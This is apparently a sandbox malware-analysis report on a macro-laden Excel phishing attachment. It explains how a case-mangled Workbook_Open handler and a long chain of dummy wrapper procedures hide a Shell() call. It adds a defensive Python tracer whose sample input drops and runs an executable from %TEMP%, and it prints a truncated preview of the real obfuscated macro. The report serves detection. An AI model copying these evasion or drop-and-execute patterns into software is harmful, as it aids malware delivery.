Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72578440a76e491e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 90.0 KB
Created: 2018-05-27 20:27:36
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: acb4eff23a0836dd4cadfa0e47676d2b
SHA-1: 5f62b3d9601c18fb76e199c2ae6337a510f48b6b
SHA-256: 72578440a76e491e7f6c53e39b02bd041383ecf293c90538dda82e5d1417cad1
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an Excel workbook containing VBA macros. The ThisWorkbook module defines a Workbook_Open event handler, written as WoRkbooK_oPen in the source: VBA identifiers are case-insensitive, so the handler still fires on open, while a case-sensitive string match for "Workbook_Open" misses it. The handler enters a long chain of trivial wrapper procedures with random five-letter names and meaningless return types (Object, Single, Currency, Date ...), each of which does nothing but call the next; this padding pushes the eventual Shell() call deep into the call graph to hide it from static analysis and simple proximity heuristics. The document body displays a fake error message in Turkish prompting the user to enable macros, a common social-engineering lure. Taken together, the Workbook_Open auto-execution, the Shell() and Environ() calls, and the download/execution tokens found in the compiled p-code strongly suggest that the macro downloads and executes a second-stage payload. The final command line is not visible in the truncated source preview below.
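The two obfuscation tricks described above (a case-mangled auto-exec handler and a long chain of do-nothing wrapper procedures) defeat scanners that look for the literal string "Workbook_Open" or for Shell() within a few lines of it. The following is an added example, not code from the report, the sandbox or the sample: a small Python call-graph tracer that parses VBA procedures case-insensitively, follows Call chains from any auto-exec entry point and reports which execution sinks are reachable and through which wrapper path. The input is a constructed VBA fragment modelled on the structure of the extracted macros.bas; the stand-in payload path, the dead procedure and the list of sink names are assumptions made for the example, not facts from the sample.

```python
import re
from collections import deque

# Constructed test input modelled on the carved macros.bas: a mixed-case
# Workbook_Open handler, a chain of wrapper procedures with random names,
# and an Environ()/Shell() sink at the bottom. Hypothetical stand-in only;
# the real sample's Shell() call lies beyond the truncated preview.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Option Explicit
Public Sub WoRkbooK_oPen(): Call htehi: End Sub
Private Function htehi()
Call MpMBv
End Function
Private Sub MpMBv()
Call rkuWI
End Sub
Static Function rkuWI() As Object
    Dim p As String
    p = Environ("TEMP") & "\stage2.exe"   ' note: path assembled at runtime
    Shell p, vbHide
End Function
Private Sub unused()
    MsgBox "dead code"
End Sub
'''

# Auto-execution entry points, compared case-insensitively as VBA itself does.
AUTOEXEC = {"workbook_open", "auto_open", "autoopen", "document_open",
            "autoexec", "autoclose", "workbook_beforeclose"}
# Execution / download sinks worth flagging when reachable from an entry point.
SINKS = {"shell", "environ", "createobject", "getobject",
         "shellexecute", "urldownloadtofile"}

HEADER_RE = re.compile(
    r'^(?:(?:public|private|static|friend)\s+)*(?:sub|function)\s+([A-Za-z_]\w*)', re.I)
END_RE = re.compile(r'^end\s+(?:sub|function)\b', re.I)
STRING_RE = re.compile(r'"[^"]*"')
IDENT_RE = re.compile(r'\b([A-Za-z_]\w*)\b')


def normalize(src):
    """Split VBA's ':' statement separator onto separate lines so that a
    one-liner such as 'Sub X(): Call y: End Sub' parses like a multi-line
    procedure. Colons inside string literals and in ':=' (named arguments)
    are left alone; a trailing ' comment is dropped."""
    out = []
    for raw in src.splitlines():
        buf, in_str, i = [], False, 0
        while i < len(raw):
            ch = raw[i]
            if ch == '"':
                in_str = not in_str
            elif ch == "'" and not in_str:
                break                       # rest of the line is a comment
            elif ch == ':' and not in_str and raw[i + 1:i + 2] != '=':
                out.append(''.join(buf))
                buf = []
                i += 1
                continue
            buf.append(ch)
            i += 1
        out.append(''.join(buf))
    return [s.strip() for s in out if s.strip()]


def parse_procedures(src):
    """Return {lower_name: {"name": original_name, "body": [statements]}}."""
    procs, cur, body = {}, None, []
    for stmt in normalize(src):
        m = HEADER_RE.match(stmt)
        if cur is None and m:
            cur, body = m.group(1), []
        elif cur is not None and END_RE.match(stmt):
            procs[cur.lower()] = {"name": cur, "body": body}
            cur = None
        elif cur is not None:
            body.append(stmt)
    return procs


def trace(procs, entry, visited):
    """Breadth-first walk of the call graph from `entry`, recording every
    sink reached together with the wrapper chain that leads to it."""
    findings = []
    visited.add(entry)
    queue = deque([(entry, [procs[entry]["name"]])])
    while queue:
        name, path = queue.popleft()
        for stmt in procs[name]["body"]:
            code = STRING_RE.sub('""', stmt)   # identifiers inside strings do not count
            for tok in IDENT_RE.findall(code):
                t = tok.lower()
                if t in SINKS:
                    findings.append({"entry": procs[entry]["name"], "sink": tok,
                                     "path": path, "statement": stmt})
                elif t in procs and t not in visited:
                    visited.add(t)
                    queue.append((t, path + [procs[t]["name"]]))
    return findings


def analyze(src):
    procs = parse_procedures(src)
    entries = [p["name"] for n, p in procs.items() if n in AUTOEXEC]
    findings, visited = [], set()
    for entry in entries:
        findings.extend(trace(procs, entry.lower(), visited))
    unreachable = sorted(p["name"] for n, p in procs.items() if n not in visited)
    return {"entries": entries, "findings": findings, "unreachable": unreachable}


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    print("auto-exec entry points:", result["entries"])
    for f in result["findings"]:
        print(f"{f['sink']}() reachable via {' -> '.join(f['path'])}: {f['statement']}")
    print("never reached from any entry point:", result["unreachable"])
```

Run against the real macros.bas carved by olevba, the tracer reports the Shell() sink with the full wrapper chain rather than a bare "Shell() call in VBA" hit, and lists procedures no entry point ever reaches (often decoy code). It is deliberately simple: it does not resolve CallByName, Application.Run with a string argument, or calls through object variables, so an empty result is not a clean bill of health.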

Heuristics (6)

  • ClamAV: Xls.Malware.Valyria-10036513-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA source calls Shell(), which launches an external program or command line.
  • Workbook_Open macro (high) OLE_VBA_WBOPEN
    The ThisWorkbook module defines a Workbook_Open event handler, which runs automatically when the file is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    The VBA source calls Environ(), which reads environment variables (commonly used to build a drop path from %TEMP% or %APPDATA%).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  16618 bytes
SHA-256: b3fd247dff2bcf7eddc5e71a7c9c8ebac8c9b63c363cac712efac2d9b690727e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WoRkbooK_oPen(): Call htehi: End Sub
Private Function htehi()
Call MpMBv
End Function
Private Sub MpMBv()
Call rkuWI
End Sub
Static Function rkuWI() As Object
Call kAkHz
End Function
Static Sub kAkHz()
Call PwScM
End Sub
Static Sub PwScM()
Call urAxZ
End Sub
Static Function urAxZ() As Single
Call ZniSm
End Function
Private Function ZniSm() As Byte
Call EiPnz
End Function
Private Function EiPnz() As Byte
Call xzGYp
End Function
Static Sub xzGYp()
Call cuosC
End Sub
Static Function cuosC() As Currency
Call HpWNP
End Function
Static Sub HpWNP()
Call nlEic
End Sub
Static Function nlEic() As Double
Call gBuTT
End Function
Private Sub gBuTT()
Call Lxcog
End Sub
Private Function Lxcog() As Variant
Call qsKJt
End Function
Private Sub qsKJt()
Call VnseG
End Sub
Static Function VnseG() As Integer
Call AjayT
End Function
Static Sub AjayT()
Call tzQkK
End Sub
Static Function tzQkK()
Call YvyEX
End Function
Static Function YvyEX()
Call DqgZk
End Function
Private Function DqgZk() As Date
Call ilOux
End Function
Private Sub ilOux()
Call NhvPK
End Sub
Static Function NhvPK() As Boolean
Call GxmAA
End Function
Static Function GxmAA() As Boolean
Call ltUVN
End Function
Static Sub ltUVN()
Call QoCqa
End Sub
Static Function QoCqa() As Byte
Call vjkKn
End Function
Private Sub vjkKn()
Call oAave
End Sub
Private Function oAave() As Long
Call TvIQr
End Function
Static Sub TvIQr()
Call zrqlE
End Sub
Static Function zrqlE() As String
Call emYGR
End Function
Static Sub emYGR()
Call JhFbe
End Sub
Static Function JhFbe() As String
Call CywMV
End Function
Private Sub CywMV()
Call newHn
End Sub
Function newHn() As Currency
Call RhuOl
End Function
Function RhuOl() As Boolean
Call vlsVj
End Function
Function vlsVj() As Single
Call Yoqdh
End Function
Function Yoqdh() As Integer
Call Crokf
End Function
Function Crokf() As String
Call gvnse
End Function
Static Sub gvnse()
Call wdcjy
End Sub
Static Sub wdcjy()
Call agaqw
End Sub
Static Sub agaqw()
Call EjYyu
End Sub
Static Function EjYyu() As Single
Call hnWFs
End Function
Static Function hnWFs()
Call LqUNr
End Function
Static Function LqUNr() As String
Call ptTUp
End Function
Static Function ptTUp() As Double
Call FbILJ
End Function
Static Function FbILJ() As Byte
Call jfGSH
End Function
Static Function jfGSH() As Single
Call MiEaF
End Function
Sub MiEaF()
Call qlChD
End Sub
Sub qlChD()
Call UpApC
End Sub
Sub UpApC()
Call ysywA
End Sub
Sub ysywA()
Call cvxEy
End Sub
Sub cvxEy()
Call sdmvS
End Sub
Sub sdmvS()
Call VhkCQ
End Sub
Function VhkCQ() As Variant
Call zkiKP
End Function
Function zkiKP() As Long
Call dngRN
End Function
Function dngRN() As Currency
Call HreYL
End Function
Function HreYL() As Date
Call ludgJ
End Function
Function ludgJ() As Object
Call AcSXd
End Function
Function AcSXd() As Integer
Call efQec
End Function
Sub efQec()
Call IjOma
End Sub
Sub IjOma()
Call mmMtY
End Sub
Sub mmMtY()
Call QpKBW
End Sub
Sub QpKBW()
Call ttIIU
End Sub
Sub ttIIU()
Call Jbyzp
End Sub
Sub Jbyzp()
Call wMWbU
End Sub
Static Function wMWbU() As Double
Call sMgnp
End Function
Function sMgnp() As Object
Call nNqyJ
End Function
Static Sub nNqyJ()
Call jOAKe
End Sub
Sub jOAKe()
Call eOKWy
End Sub
Static Function eOKWy() As Integer
Call MuLSp
End Function
Static Function MuLSp() As Byte
Call Iv
... (truncated)